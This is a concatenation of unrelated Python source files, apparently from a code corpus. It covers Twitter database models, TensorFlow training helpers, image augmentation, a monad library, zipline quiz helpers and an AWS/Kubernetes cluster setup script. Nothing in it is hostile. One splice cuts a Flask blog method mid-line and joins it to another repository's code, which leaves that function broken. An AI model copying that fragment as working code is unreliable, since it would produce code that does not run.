created_at = Column(String(100)) entities = Column(String(225)) favourites_count = Column(Integer) statuses_count = Column(Integer) id = Column(String(225)) location = Column(String(225)) is_translation_enabled = Column(String(10)) other_data = Column(JSON()) record_created = Column(DateTime, server_default=func.now()) record_updated = Column(DateTime, onupdate=datetime.datetime.now) audit_data = Column(JSON()) def item_type( self ): return 'user' def to_dict( self ): mapper = inspect(Users) return { column.key : getattr(self, column.key) for column in mapper.attrs} # def add_tweet_update_info_to_audit_data( self, toAdd ): # d = self.audit_data # for k in d.keys(): # print(k) # # if 'updated_from_tweet' not in d.keys(): # print('adding') # d['updated_from_tweet'] = [] # # d['updated_from_tweet'].append(toAdd) # self.audit_data = d class User(Users): """Better named alias""" def __init__(self, **kwargs): super().__init__(**kwargs) class Hashtags(Base): __tablename__ = 'hashtags' # Here we define columns for the table hashtags # Notice that each column is also a normal Python instance attribute. tagID = Column(Integer, primary_key=True) hashtag = Column(String(100), nullable=False) # record_created = Column(DateTime, server_default=func.now()) # record_updated = Column(DateTime, onupdate=func.now()) class Tweets(Base): __tablename__ = 'tweets' # Here we define columns for the table address. # Notice that each column is also a normal Python instance attribute. tweetID = Column(Integer, primary_key=True, autoincrement=False) userID = Column(Integer) #, ForeignKey('users.userID')) tweetText = Column(String(250)) favorite_count = Column(Integer) source = Column(String(250), nullable=False) retweeted = Column(String(10)) retweet_count = Column(Integer) in_reply_to_screen_name = Column(String(100)) favorited = Column(String(10)) lang = Column(String(100)) created_at = Column(String(100)) profile_background_tile = Column(String(100)) is_translation_enabled = Column(String(100)) profile_location = Column(String(100)) other_data = Column(JSON()) record_created = Column(DateTime, server_default=func.now()) record_updated = Column(DateTime, onupdate=datetime.datetime.now) audit_data = Column(JSON()) def item_type( self ): return 'tweet' class Tweet(Tweets): """Better named alias""" def __init__(self, **kwargs): super().__init__( **kwargs) tweetsXtags = Table('tweetsXtags', Base.metadata, Column('tweetID', Integer), # ForeignKey('tweets.tweetID')), Column('tagID', Integer), # ForeignKey('hashtags.tagID')) ) ##################### Non definitional stuff def _make_defined_data(data, defined_keys): """Takes the incoming tweet data and pulls out all of the items which go into fields of the db and puts the rest into a json string under other_data """ # This will be the data that goes directly into the model defined_data = {} # This will be the data that goes into the other_data field forJson = { } for k in data.keys(): datum = data[k] # check whether it is a dict and encode, if necessary if type(datum) == dict: datum = json.dumps(datum) if k in defined_keys: defined_data[k] = datum else: forJson[k] = datum # Set the data that didn't have a field # to the json field defined_data['other_data'] = json.dumps(forJson) return defined_data def TweetFactory( data: dict ): """This consumes a dictionary of data and returns a Tweet object. 
If the dictionary contains keys which do not correspond to a field in User, such fields are added to the json column `other_data` This is necessary because Twitter sometimes updates the keys in the results that we receive and sqlalchemy will be sad if pass in data which lacks defined fields. NB, this simply creates and populates the Tweet object. It does not add or commit it to the database :type data: dict """ # The first step is to sort the incoming data mapper = inspect(Tweets) # create the list of valid keys defined_keys = [column.key for column in mapper.attrs] defined_data = _make_defined_data(data, defined_keys) # Now set any fields which do not have couterparts in the # the incoming data defined_data['tweetID'] = int(data['id_str']) defined_data['userID'] = int(data['user']['id_str']) defined_data['tweetText'] = data['text'].encode('unicode_escape') # create a new instance with the data return Tweet(**defined_data) def UserFactory( data: dict ): """This consumes a dictionary of data and returns a User object. If the dictionary contains keys which do not correspond to a field in User, such fields are added to the json column `other_data` This is necessary because Twitter sometimes updates the keys in the results that we receive and sqlalchemy will be sad if pass in data which lacks defined fields. NB, this simply creates and populates the User object. It does not add or commit it to the database :rtype: object :type data: dict """ # The first step is to sort the incoming data mapper = inspect(Users) # These will be the fields to save to corresponding columns # in the database defined_keys = [column.key for column in mapper.attrs] defined_data = _make_defined_data(data, defined_keys) # Now set any fields which do not have couterparts in the # the incoming data defined_data['userID'] = int(defined_data['id']) # create a user instance with the data return User(**defined_data) # # # This will be the data that goes directly into the model # defined_data = {} # # This will be the data that goes into the other_data field # forJson = { } # # for k in data.keys(): # datum = data[k] # # check whether it is a dict and encode, if necessary # if type(datum) == dict: # datum = json.dumps(datum) # # if k in defined_keys: # defined_data[k] = datum # # else: # forJson[k] = datum def create_db_tables(engine, seed=False): """Creates tables in the database Create all tables in the engine. This is equivalent to "Create Table" statements in raw SQL. # """ # engine = DatabaseAccessObjects.EngineMakers.initialize_engine() # create the tables Base.metadata.create_all(engine) # metadata = MetaData( ) abhinavarora/pytext0 #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved import glob import json import os import unittest from pytext.builtin_task import register_builtin_tasks from pytext.config import PyTextConfig, config_from_json from pytext.config.config_adapter import upgrade_one_version, upgrade_to_latest register_builtin_tasks() class ConfigAdapterTest(unittest.TestCase): def test_upgrade_one_version(self): for p in glob.iglob( os.path.join(os.path.dirname(__file__), "json_config/*.json") ): print("Trying to upgrade file:" + p) with open(p) as f: test_data = json.load(f) for test_case in test_data: old_config = test_case["original"] new_config = upgrade_one_version(old_config) self.assertEqual(new_config, test_case["adapted"]) # ensure every historical config can be upgrade to latest def test_upgrade_to_latest(self): for p in glob.iglob( os.path.join(os.path.dirname(__file__), "json_config/*.json") ): print("Trying to upgrade file:" + p) with open(p) as f: test_data = json.load(f) for test_case in test_data: json_config = upgrade_to_latest(test_case["original"]) config_from_json(PyTextConfig, json_config) # Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Trains and Evaluates the MNIST network using a feed dictionary.""" # pylint: disable=missing-docstring import os import time import numpy from six.moves import xrange # pylint: disable=redefined-builtin import tensorflow as tf import math import numpy as np def placeholder_inputs(batch_size=16, num_frame_per_clib=16, crop_size=224, rgb_channels=3, flow_channels=2): """Generate placeholder variables to represent the input tensors. These placeholders are used as inputs by the rest of the model building code and will be fed from the downloaded data in the .run() loop, below. Args: batch_size: The batch size will be baked into both placeholders. num_frame_per_clib: The num of frame per clib. crop_size: The crop size of per clib. channels: The input channel of per clib. Returns: images_placeholder: Images placeholder. labels_placeholder: Labels placeholder. """ # Note that the shapes of the placeholders match the shapes of the full # image and label tensors, except the first dimension is now batch_size # rather than the full size of the train or test data sets. 
rgb_images_placeholder = tf.placeholder(tf.float32, shape=(batch_size, num_frame_per_clib, crop_size, crop_size, rgb_channels)) flow_images_placeholder = tf.placeholder(tf.float32, shape=(batch_size, num_frame_per_clib, crop_size, crop_size, flow_channels)) labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size )) is_training = tf.placeholder(tf.bool) return rgb_images_placeholder, flow_images_placeholder, labels_placeholder, is_training def average_gradients(tower_grads): average_grads = [] for grad_and_vars in zip(*tower_grads): grads = [] for g, _ in grad_and_vars: expanded_g = tf.expand_dims(g, 0) grads.append(expanded_g) grad = tf.concat(grads, 0) grad = tf.reduce_mean(grad, 0) v = grad_and_vars[0][1] grad_and_var = (grad, v) average_grads.append(grad_and_var) return average_grads def tower_loss( logit, labels): print(labels) print(logit) print(logit.shape) cross_entropy_mean = tf.reduce_mean( tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logit) ) # Calculate the total loss for the current tower. total_loss = cross_entropy_mean return total_loss def tower_acc(logit, labels): correct_pred = tf.equal(tf.argmax(logit, 1), labels) accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) return accuracy def _variable_on_cpu(name, shape, initializer): with tf.device('/cpu:0'): var = tf.get_variable(name, shape, initializer=initializer) return var def _variable_with_weight_decay(name, shape, wd): var = _variable_on_cpu(name, shape, tf.contrib.layers.xavier_initializer()) if wd is not None: weight_decay = tf.nn.l2_loss(var)*wd tf.add_to_collection('weightdecay_losses', weight_decay) return var from multiprocessing import Pool from contextlib import closing import pandas as pd import numpy as np import argparse import glob import time try: import __builtin__ except ImportError: # Python 3 import builtins as __builtin__ # For debugging purposes only: def print(*args, **kwargs): __builtin__.print('\t molecular_file_count_updated: ', end="") return __builtin__.print(*args, **kwargs) parser = argparse.ArgumentParser() parser.add_argument('-pt','--project_name',required=True,help='Name of the DD project') parser.add_argument('-it','--n_iteration',required=True,help='Number of current DD iteration') parser.add_argument('-cdd','--data_directory',required=True,help='Path to directory contaning the remaining molecules of the database ') parser.add_argument('-t_pos','--tot_process',required=True,help='Number of CPUs to use for multiprocessing') parser.add_argument('-t_samp','--tot_sampling',required=True,help='Total number of molecules to sample in the current iteration; for first iteration, consider training, validation and test sets, for others only training') io_args = parser.parse_args() protein = io_args.project_name n_it = int(io_args.n_iteration) data_directory = io_args.data_directory tot_process = int(io_args.tot_process) tot_sampling = int(io_args.tot_sampling) print("Parsed Args:") print(" - Iteration:", n_it) print(" - Data Directory:", data_directory) print(" - Training Size:", tot_process) print(" - Validation Size:", tot_sampling) def write_mol_count_list(file_name,mol_count_list): with open(file_name,'w') as ref: for ct,file_name in mol_count_list: ref.write(str(ct)+","+file_name.split('/')[-1]) ref.write("\n") def molecule_count(file_name): temp = 0 with open(file_name,'r') as ref: ref.readline() for line in ref: temp+=1 return temp, file_name if __name__=='__main__': files = [] for f in glob.glob(data_directory+'/*.txt'): files.append(f) 
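# Illustrative aside on molecule_count() above: it drops the header line and counts the
# remaining records, and the Pool below fans that out across files. The same
# count-minus-header idea on an in-memory file (no multiprocessing needed for the sketch):
import io as _io

def _count_records(fh):
    fh.readline()  # skip the header row
    return sum(1 for _ in fh)

assert _count_records(_io.StringIO("smiles,id\nCCO,1\nCCC,2\n")) == 2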
print("Number Of Files:", len(files)) t=time.time() print("Reading Files...") with closing(Pool(np.min([tot_process,len(files)]))) as pool: rt = pool.map(molecule_count,files) print("Done Reading Finals - Time Taken", time.time()-t) print("Saving File Count...") write_mol_count_list(data_directory+'/Mol_ct_file.csv',rt) mol_ct = pd.read_csv(data_directory+'/Mol_ct_file.csv',header=None) mol_ct.columns = ['Number_of_Molecules','file_name'] Total_sampling = tot_sampling Total_mols_available = np.sum(mol_ct.Number_of_Molecules) mol_ct['Sample_for_million'] = [int(Total_sampling/Total_mols_available*elem) for elem in mol_ct.Number_of_Molecules] mol_ct.to_csv(data_directory+'/Mol_ct_file_updated.csv',sep=',',index=False) print("Done - Time Taken", time.time()-t) BarrensZeppelin/PyRival1-10 def scc(graph): """ Finds what strongly connected components each node is a part of in a directed graph, it also finds a weak topological ordering of the nodes """ n = len(graph) comp = [-1] * n top_order = [] Q = [] stack = [] new_node = None for root in range(n): if comp[root] >= 0: continue # Do a dfs while keeping track of depth Q.append(root) root_depth = len(top_order) while Q: node = Q.pop() if node >= 0: if comp[node] >= 0: continue # First time # Index the node comp[node] = len(top_order) + len(stack) stack.append(node) # Do a dfs Q.append(~node) Q += graph[node] else: # Second time node = ~node # calc low link low = index = comp[node] for nei in graph[node]: if root_depth <= comp[nei]: low = min(low, comp[nei]) # low link same as index, so create SCC if low == index: while new_node != node: new_node = stack.pop() comp[new_node] = index top_order.append(new_node) else: comp[node] = low top_order.reverse() return comp, top_order # -*- coding: utf-8 -*- # @Time : 2019-12-21 # @Author : mizxc # @Email : import os import random from mongoengine import * from flask_login import UserMixin, AnonymousUserMixin from project.model.blog import * from project.model.photoAlbum import * from project.config import BaseConfig USER_CUSTOM = { 'webName': 'kispower', 'webIntro': u'好用的知识管理工具', 'webKeywords':u'kispower 知识管理 学习工具', 'favicon': 'local/images/favicon.png', 'logo': 'local/images/logo.png', 'copyright':u'Copyright © 2020 Kispower All rights reserved 粤ICP备xxxxxx号', 'statisticalCode':'', 'commentCode':'', 'homeTemplate': 'theme/lifeleck', 'slide':[ ['local/images/slide1.jpg','kispower','个人知识管理系统','http://www.kispower.com'], ['local/images/slide2.jpg','kispower','最好用的知识管理系统','http://www.kispower.com'], ['local/images/slide3.jpg','kispower','知识管理+时间管理','http://www.kispower.com'], ['local/images/slide4.jpg','kispower','个人知识分享网站','http://www.kispower.com'], ['local/images/slide5.jpg','kispower','个人网络工作室','http://www.kispower.com'] ], 'tags':{}, 'weixin':'local/images/weixin.jpg', 'weibo':'https://weibo.com/p/1005056368574508', 'dailyTasks':[ ['L1',u'请点击:日常任务管理,添加常用任务'], ['L2',u'如果不需要可以删除全部日常任务'] ] } class CommonUserMethod: def getRandomImage(self): randomImagePath = os.path.join(BaseConfig.BASE_DIR, BaseConfig.RANDOM_IMAGE_PATH) images = os.listdir(randomImagePath) return '/%s/%s' % (BaseConfig.RANDOM_IMAGE_PATH,random.choice(images)) def getBlogColumn(self): return Column.objects.order_by('+number') def getRecentPost(self): return Post.objects.order_by('-id')[:5] def getHotPost(self): return Post.objects.order_by('-pv')[:5] def getPrevAndNextPost(self,id): ps = Post.objects prev = None next = None for index, p in enumerate(ps): if p.id == id: if index!=0:prev = ps[index-1] if index+1constrainedlearning/advbench 
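# Usage sketch for scc() above (the PyRival helper): it returns each node's strongly
# connected component label plus a weak topological order of the nodes. The example graph
# is ours: a three-node cycle 0 -> 1 -> 2 -> 0 with a tail node 3 hanging off node 2.
_demo_graph = [[1], [2], [0, 3], []]
_comp, _order = scc(_demo_graph)
assert _comp[0] == _comp[1] == _comp[2] != _comp[3]  # the cycle is one component, 3 is its own
assert _order.index(3) > _order.index(0)             # the tail comes after the cycle in the ordering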
import torch from numpy import pi from einops import rearrange, reduce, repeat from kornia.geometry import warp_affine from kornia.geometry.transform import Affine import numpy as np import functools import math def deg2rad(angle): return angle*pi/180.0 def _compute_tensor_center(tensor: torch.Tensor) -> torch.Tensor: """Compute the center of tensor plane for (H, W), (C, H, W) and (B, C, H, W).""" if not 2 <= len(tensor.shape) <= 4: raise AssertionError(f"Must be a 3D tensor as HW, CHW and BCHW. Got {tensor.shape}.") height, width = tensor.shape[-2:] center_x: float = float(width - 1) / 2 center_y: float = float(height - 1) / 2 center: torch.Tensor = torch.tensor([center_x, center_y], device=tensor.device, dtype=tensor.dtype) return center def angle_to_rotation_matrix(angle, imgs): """Create a rotation matrix out of angles in degrees. Args: angle: tensor of angles in degrees, shape Bx1. Returns: tensor of rotation matrices with shape (B, 2, 3). """ B = angle.shape[0] ang_rad = deg2rad(angle) cos_a = torch.cos(ang_rad) sin_a = torch.sin(ang_rad) center = _compute_tensor_center(imgs) rotat_m = repeat(torch.eye(3), 'd1 d2 -> b d1 d2',b=B).clone() a_mat = torch.stack([cos_a, sin_a, -sin_a, cos_a], dim=-1) rotat_m[:, :2, :2] = rearrange(a_mat, 'b (d1 d2) -> b d1 d2', d1=2, d2=2).clone() center = repeat(_compute_tensor_center(imgs), 'd -> b d',b=B).clone() shift_m = txs_to_translation_matrix(center) shift_m_inv = txs_to_translation_matrix(-center) return shift_m @ rotat_m @ shift_m_inv def se_matrix(delta, imgs): """ delta: Bx3 (third dimension is rotation , w translation, h traslation) returns se: Bx2x3 """ angle, txs = delta[:, 0], delta[:,1:] affine = torch.zeros((angle.shape[0],2,3)) rotat_m = angle_to_rotation_matrix(angle, imgs) trans_m = txs_to_translation_matrix(txs) return (rotat_m@trans_m)[:,:2,:] def txs_to_translation_matrix(txs): """Create a translation matrix out of translations in pixels. Args: txs: tensor of translations in pixels, shape Bx2 Returns: tensor of translation matrices with shape (B, 3, 3). """ shift_m = repeat(torch.eye(3), 'd1 d2 -> b d1 d2', b=txs.shape[0]).clone() shift_m[:, :2, 2] = txs return shift_m def se_transform(imgs, delta): return warp_affine(imgs, se_matrix(delta, imgs).to(imgs.device).to(imgs.dtype), imgs.shape[2:]) def translation(imgs, delta): """ delta: Bx3 ( flip, w translation, h traslation) returns se: Bx2x3 """ return Affine(translation = delta.to(imgs.device).to(imgs.dtype))(imgs) class Cutout: """Randomly mask out a patch from an image. Args: size (int): The size of the square patch. """ def __init__(self, size): self.size = size def __call__(self, img): """ Args: img (Tensor): Tensor image Returns: Tensor: Image with a hole of dimension size x size cut out of it. """ h = img.size(1) w = img.size(2) mask = np.ones((h, w), np.float32) y = np.random.randint(h) x = np.random.randint(w) y1 = np.clip(y - self.size // 2, 0, h) y2 = np.clip(y + self.size // 2, 0, h) x1 = np.clip(x - self.size // 2, 0, w) x2 = np.clip(x + self.size // 2, 0, w) mask[y1: y2, x1: x2] = 0. 
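# Aside on angle_to_rotation_matrix() above: it rotates about the image centre by
# conjugating a plane rotation with translations to and from the centre
# (shift_m @ rotat_m @ shift_m_inv). The same composition for a single 3x3 homogeneous
# matrix in plain numpy; the angle and centre below are made-up example values.
import numpy as np

def _rotation_about(cx, cy, degrees):
    a = np.deg2rad(degrees)
    rot = np.array([[np.cos(a), np.sin(a), 0.0],
                    [-np.sin(a), np.cos(a), 0.0],
                    [0.0, 0.0, 1.0]])
    shift = np.array([[1.0, 0.0, cx], [0.0, 1.0, cy], [0.0, 0.0, 1.0]])
    shift_inv = np.array([[1.0, 0.0, -cx], [0.0, 1.0, -cy], [0.0, 0.0, 1.0]])
    return shift @ rot @ shift_inv

_m = _rotation_about(2.0, 2.0, 90.0)
assert np.allclose(_m @ np.array([2.0, 2.0, 1.0]), [2.0, 2.0, 1.0])  # the centre is a fixed point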
mask = torch.from_numpy(mask) mask = mask.expand_as(img) img = img * mask return img ################### ##### Pointcloud ################## def translate_pointcloud(pointcloud): xyz1 = np.random.uniform(low=2./3., high=3./2., size=[3]) xyz2 = np.random.uniform(low=-0.2, high=0.2, size=[3]) translated_pointcloud = np.add(np.multiply(pointcloud, xyz1), xyz2).astype('float32') return translated_pointcloud def jitter_pointcloud(pointcloud, sigma=0.01, clip=0.02): N, C = pointcloud.shape pointcloud += np.clip(sigma * np.random.randn(N, C), -1*clip, clip) return pointcloud from functools import wraps __all__ = ( 'Just', 'Nothing', 'Left', 'Right', 'Success', 'Failture', 'IO', 'maybe', 'maybe_wraps', 'either', 'either_wraps', 'error', 'error_wraps', 'io', 'io_wraps', ) class Monad(object): __slots__ = ('_val', ) def __init__(self, val): self._val = val def __rshift__(self, form): if isinstance(form, (list, tuple)): func, args = form[0], form[1:] else: func = form args = () return func(self._val, *args) def bind(self, *form): return self >> form def __eq__(self, other): """ Compares two monadic values by their type and content. """ return ( type(self) == type(other) and self._val == other._val ) def __repr__(self): return "%s[%s]" % (self.__class__.__name__, self._val) def get(self): return self._val class Nothing(Monad): """ Represents a negative Maybe value. """ def __init__(self): pass def __rshift__(self, func): """ Always returns current object without performing a passed function. """ return self def __eq__(self, other): return isinstance(other, Nothing) def __repr__(self): return self.__class__.__name__ def get(self): return None class Just(Monad): """ Represents a positive Maybe value. """ pass class Left(Monad): """ Represents a negative Either value. """ def __rshift__(self, func): return self class Right(Monad): """ Represents a positive Either value. """ pass class Success(Monad): """ Represents a positive Error value. """ def recover(self, exc_class, val_or_func): """ Does nothing, returning the current monadic value. """ return self class Failture(Monad): """ Represents a negative Error value. """ def __rshift__(self, func): return self def get(self): raise self._val def recover(self, exc_class, val_or_func): """ Recovers an exception. :param exc_class: An exception class or a tuple of classes to recover. :type exc_class: Exception|tuple of Exception :param val_or_func: A value or a function to get a positive result. :type val_or_func: any|function :return: Success instance if the cought exception matches `exc_class` or Failture if it does not. :rtype: Failture|Success Usage: error(lambda: 1 / 0).recover(Exception, 42).get() >>> 42 """ e = self._val def is_callable(val): return hasattr(val_or_func, '__call__') def resolve(): if is_callable(val_or_func): return val_or_func(e) else: return val_or_func if isinstance(e, exc_class): return Success(resolve()) else: return self class IO(Monad): """ Represents IO value. """ pass def maybe(pred): """ Maybe constructor. Takes a predicate and returns a function that receives `x` and returns a Maybe instance of `x`. :param pred: a function that determines if a value is Just or Nothing. :type pred: function :return: Maybe unit function. :rtype: function """ def maybe_unit(x): """ Maybe unit. :param x: Any non-monadic value. :type x: any :return: Monadic value. :rtype: Just|Nothing """ if pred(x): return Just(x) else: return Nothing() return maybe_unit def maybe_wraps(pred): """ Decorator that wraps a function with maybe behaviour. 
""" def decorator(func): @wraps(func) def wrapper(*args, **kwargs): return maybe(pred)(func(*args, **kwargs)) return wrapper return decorator def either(pred_l, pred_r): """ Either constructor. Takes two predicates and returns a function that receives `x` and returns an Either instance of `x`. :param pred_l: Left predicate. :type pred_l: function :param pred_r: Right predicate. :type pred_r: function :return: Either unit function. :rtype: function """ def either_unit(x): """ Either unit. :param x: Any non-monadic value. :type x: any :return: Monadic value. :rtype: Left|Right """ if pred_l(x): return Left(x) if pred_r(x): return Right(x) msg = "Value %s doesn't fit %s nor %s predicates." params = (x, pred_l, pred_r) raise TypeError(msg % params) return either_unit def either_wraps(pred_l, pred_r): """ Decorator that wraps a function with either behaviour. """ def decorator(func): @wraps(func) def wrapper(*args, **kwargs): return either(pred_l, pred_r)(func(*args, **kwargs)) return wrapper return decorator def error(func): """ Error constructor. Takes a function with additional arguments. Calls the function handling any possible exceptions. Returns either `Success` with actual value or `Failture` with an exception instance inside. :param func: A function to call. :type func: function :param args: A tuple of positional parameters :type args: tuple of any :param kwargs: A dict of named parameters. :type kwargs: dict of any :return: Monadic value of Error :rtype: Success|Failture """ def error_unit(*args, **kwargs): try: return Success(func(*args, **kwargs)) except Exception as e: return Failture(e) return error_unit error_wraps = error def io(func): """ Decorator that wraps a function with IO behaviour. """ @wraps(func) def wrapper(*args, **kwargs): return IO(func(*args, **kwargs)) return wrapper io_wraps = io 0 import tkinter as tk # import tkinter in Python 3. 
If using Python 2 change to: import Tkinter from tkinter import ttk # Themed tkinter (Improves GUI look and feel) class Window(tk.Tk): # Class window inherits from tk.Tk() def __init__(self, title="Window", Height=500, Width=500, resizable=True, centered=True): # Constructor super().__init__() self.title(title) self.height, self.width = Height, Width self.geometry(str(Height)+"x"+str(Width)) if(not resizable): self.resizable(0,0) if(centered): self.centerWindow() self.bind("", self.exit) def centerWindow(self): # Makes the window appears on the screen center screenWidth, screenHeight = self.winfo_screenwidth(), self.winfo_screenheight() x, y = int(screenWidth/2 - self.width/2), int(screenHeight/2 - self.height/2) self.geometry("+{}+{}".format(x, y)) def exit(self, event): self.destroy() def run(self): self.mainloop()jcrangel/AI-for-TradingQuiz/m4_multifactor_models/m4l3/quiz_helper.py import numpy as np import pandas as pd import time import alphalens as al from zipline.assets._assets import Equity # Required for USEquityPricing from zipline.pipeline.data import USEquityPricing from zipline.pipeline.classifiers import Classifier from zipline.pipeline.engine import SimplePipelineEngine from zipline.pipeline.loaders import USEquityPricingLoader from zipline.utils.numpy_utils import int64_dtype # EOD_BUNDLE_NAME = 'm4-quiz-eod-quotemedia' EOD_BUNDLE_NAME = 'eod-quotemedia' class PricingLoader(object): def __init__(self, bundle_data): self.loader = USEquityPricingLoader( bundle_data.equity_daily_bar_reader, bundle_data.adjustment_reader) def get_loader(self, column): if column not in USEquityPricing.columns: raise Exception('Column not in USEquityPricing') return self.loader class Sector(Classifier): dtype = int64_dtype window_length = 0 inputs = () missing_value = -1 def __init__(self): self.data = np.load('../../data/project_4_sector/data.npy') def _compute(self, arrays, dates, assets, mask): return np.where( mask, self.data[assets], self.missing_value, ) def build_pipeline_engine(bundle_data, trading_calendar): pricing_loader = PricingLoader(bundle_data) engine = SimplePipelineEngine( get_loader=pricing_loader.get_loader, calendar=trading_calendar.all_sessions, asset_finder=bundle_data.asset_finder) return engine def get_factor_exposures(factor_betas, weights): return factor_betas.loc[weights.index].T.dot(weights) def get_pricing(data_portal, trading_calendar, assets, start_date, end_date, field='close'): end_dt = pd.Timestamp(end_date.strftime('%Y-%m-%d'), tz='UTC', offset='C') start_dt = pd.Timestamp(start_date.strftime('%Y-%m-%d'), tz='UTC', offset='C') end_loc = trading_calendar.closes.index.get_loc(end_dt) start_loc = trading_calendar.closes.index.get_loc(start_dt) return data_portal.get_history_window( assets=assets, end_dt=end_dt, bar_count=end_loc - start_loc, frequency='1d', field=field, data_frequency='daily') def make_factor_plot(df, data_portal, trading_calendar, start_date, end_date): assets = df.index.levels[1].values.tolist() df = df.dropna() pricing = get_pricing( data_portal, trading_calendar, assets, start_date, end_date, 'close' ) factor_names = df.columns factor_data = {} start_time = time.clock() for factor in factor_names: print("Formatting factor data for: " + factor) factor_data[factor] = al.utils.get_clean_factor_and_forward_returns( factor=df[factor], prices=pricing, periods=[1] ) end_time = time.clock() print("Time to get arrange factor data: %.2f secs" % (end_time - start_time)) ls_factor_returns = [] start_time = time.clock() for i, factor in 
enumerate(factor_names): ls = al.performance.factor_returns(factor_data[factor]) ls.columns = [factor] ls_factor_returns.append(ls) end_time = time.clock() print("Time to generate long/short returns: %.2f secs" % (end_time - start_time)) df_ls_factor_returns = pd.concat(ls_factor_returns, axis=1) (1+df_ls_factor_returns).cumprod().plot(title='Factor Returns'); return df_ls_factor_returns#!/usr/bin/env python3.6 # Copyright 2018 U.C. Berkeley RISE Lab # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import boto3 import os import sys from add_nodes import add_nodes import util ec2_client = boto3.client('ec2', os.getenv('AWS_REGION', 'us-east-1')) def create_cluster(mem_count, ebs_count, func_count, sched_count, route_count, bench_count, cfile, ssh_key, cluster_name, kops_bucket, aws_key_id, aws_key): # create the cluster object with kops util.run_process(['./create_cluster_object.sh', cluster_name, kops_bucket, ssh_key]) client, apps_client = util.init_k8s() # create the kops pod print('Creating management pods...') kops_spec = util.load_yaml('yaml/pods/kops-pod.yml') env = kops_spec['spec']['containers'][0]['env'] util.replace_yaml_val(env, 'AWS_ACCESS_KEY_ID', aws_key_id) util.replace_yaml_val(env, 'AWS_SECRET_ACCESS_KEY', aws_key) util.replace_yaml_val(env, 'KOPS_STATE_STORE', kops_bucket) util.replace_yaml_val(env, 'FLUENT_CLUSTER_NAME', cluster_name) client.create_namespaced_pod(namespace=util.NAMESPACE, body=kops_spec) # wait for the kops pod to start kops_ip = util.get_pod_ips(client, 'role=kops', is_running=True)[0] # copy kube config file to kops pod, so it can execute kubectl commands kops_podname = kops_spec['metadata']['name'] kcname = kops_spec['spec']['containers'][0]['name'] os.system('cp %s kvs-config.yml' % cfile) util.copy_file_to_pod(client, '/home/ubuntu/.kube/config', kops_podname, '/root/.kube/', kcname) util.copy_file_to_pod(client, ssh_key, kops_podname, '/root/.ssh/', kcname) util.copy_file_to_pod(client, ssh_key + '.pub', kops_podname, '/root/.ssh/', kcname) util.copy_file_to_pod(client, 'kvs-config.yml', kops_podname, '/fluent/conf/', kcname) # start the monitoring pod mon_spec = util.load_yaml('yaml/pods/monitoring-pod.yml') util.replace_yaml_val(mon_spec['spec']['containers'][0]['env'], 'MGMT_IP', kops_ip) client.create_namespaced_pod(namespace=util.NAMESPACE, body=mon_spec) util.get_pod_ips(client, 'role=monitoring') # copy config file into monitoring pod -- wait till we create routing pods, # so we're sure that the monitoring nodes are up and running util.copy_file_to_pod(client, 'kvs-config.yml', mon_spec['metadata']['name'], '/fluent/conf/', mon_spec['spec']['containers'][0]['name']) os.system('rm kvs-config.yml') print('Creating %d routing nodes...' % (route_count)) add_nodes(client, apps_client, cfile, ['routing'], [route_count], True) util.get_pod_ips(client, 'role=routing') print('Creating %d memory, %d ebs node(s)...' 
% (mem_count, ebs_count)) add_nodes(client, apps_client, cfile, ['memory', 'ebs'], [mem_count, ebs_count], True) print('Creating routing service...') service_spec = util.load_yaml('yaml/services/routing.yml') client.create_namespaced_service(namespace=util.NAMESPACE, body=service_spec) print('Adding %d scheduler nodes...' % (sched_count)) add_nodes(client, apps_client, cfile, ['scheduler'], [sched_count], True) util.get_pod_ips(client, 'role=scheduler') print('Adding %d function serving nodes...' % (func_count)) add_nodes(client, apps_client, cfile, ['function'], [func_count], True) print('Creating function service...') service_spec = util.load_yaml('yaml/services/function.yml') client.create_namespaced_service(namespace=util.NAMESPACE, body=service_spec) print('Adding %d benchmark nodes...' % (bench_count)) add_nodes(client, apps_client, cfile, ['benchmark'], [bench_count], True) print('Finished creating all pods...') os.system('touch setup_complete') util.copy_file_to_pod(client, 'setup_complete', kops_podname, '/fluent', kcname) os.system('rm setup_complete') sg_name = 'nodes.' + cluster_name sg = ec2_client.describe_security_groups( Filters=[{'Name': 'group-name', 'Values': [sg_name]}])['SecurityGroups'][0] print('Authorizing ports for routing service...') permission = [{ 'FromPort': 6200, 'IpProtocol': 'tcp', 'ToPort': 6203, 'IpRanges': [{ 'CidrIp': '0.0.0.0/0' }] }] ec2_client.authorize_security_group_ingress(GroupId=sg['GroupId'], IpPermissions=permission) routing_svc_addr = util.get_service_address(client, 'routing-service') function_svc_addr = util.get_service_address(client, 'function-service') print('The routing service can be accessed here: \n\t%s' % (routing_svc_addr)) print('The function service can be accessed here: \n\t%s' % (function_svc_addr)) def parse_args(args, length, typ): result = [] for arg in args[:length]: try: result.append(typ(arg)) except ValueError: print('Unrecognized command-line argument %s. Could not convert \ to integer.' % (arg)) sys.exit(1) return tuple(result) if __name__ == '__main__': if len(sys.argv) < 5: print('Usage: ./create_cluster.py min_mem_instances min_ebs_instances' + ' min_func_instances scheduler_instances routing_instance' + ' benchmark_instances ') print() print('If no SSH key is specified, we will use the default SSH key ' + '(/home/ubuntu/.ssh/id_rsa). 
